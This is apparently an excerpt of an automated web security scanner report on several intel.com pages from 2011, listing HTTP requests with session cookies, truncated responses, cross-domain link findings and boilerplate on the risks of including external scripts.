s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:17:52 GMT Content-Length: 26203 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us"> <head> <title>Intel® Trademarks</title> <meta http-equiv="C ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /standards/index.htm?iid=subhdr+tech_stds HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 35182
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <TITLE>Intel Standards & Initiatives</TITLE> <meta name = ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
GET /support/detect.htm?iid=gg_support-EN_01+home_detect HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:28 GMT Content-Length: 29864 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US"> <head> <!-- DOC-FACTORY Generated Tags BEGIN --> <TITLE>Intel. Driver Update Utility</TITLE> <meta name = "we ...[SNIP]... <br />
GET /support/feedback.htm?iid=subhdr+res_contact HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 87216
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /support/idyp.htm?iid=gg_support-EN_01+home_sys_info_util HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:28 GMT Content-Length: 21117 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US"> <head> <TITLE>Identify your product</TITLE> <meta name = "web_author_id" content = "kcoffin"> <meta name = "c ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /support/resources.htm?iid=gg_support-EN_01+home_resources HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:28 GMT Content-Length: 23076 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US"> <head> <!-- DOC-FACTORY Generated Tags BEGIN --> <TITLE>Intel® Support - Other Support Resources and Utili ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /technology/architecture-silicon/index.htm?iid=subhdr+tech_arch HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:31 GMT Content-Length: 28153 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Architecture & Silicon Technology from Intel</titl ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /technology/manufacturing/index.htm?iid=subhdr+tech_mfg HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:32 GMT Content-Length: 29517 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel Manufacturing</title> <!-- DOC-FACTORY Gene ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /technology/product/index.htm?iid=subhdr+tech_prodtech HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:32 GMT Content-Length: 31194 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Intel Product Technologies</title> <!-- DOC-FACTO ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.pcguide.vn/
Request
GET /vi_VN/index.htm?iid=gg_en_VN+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:23 GMT Content-Length: 20446 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <meta http-equiv=Content-Type content="text/html; charset=utf- ...[SNIP]... <li><a href="http://www.pcguide.vn" onclick="waCustomLink(this,'','o','wa_iid=home-vn+pcguide');" target="_blank"><strong> ...[SNIP]...
GET /view_play_list?p=698CFFD6A87A1ACB HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:32:33 GMT Server: Apache X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: GEO=a0eadf3d397495f055b487c9dbb220f2cwsAAAAzVVOtwdbzTU3eEQ==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Connection: close
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
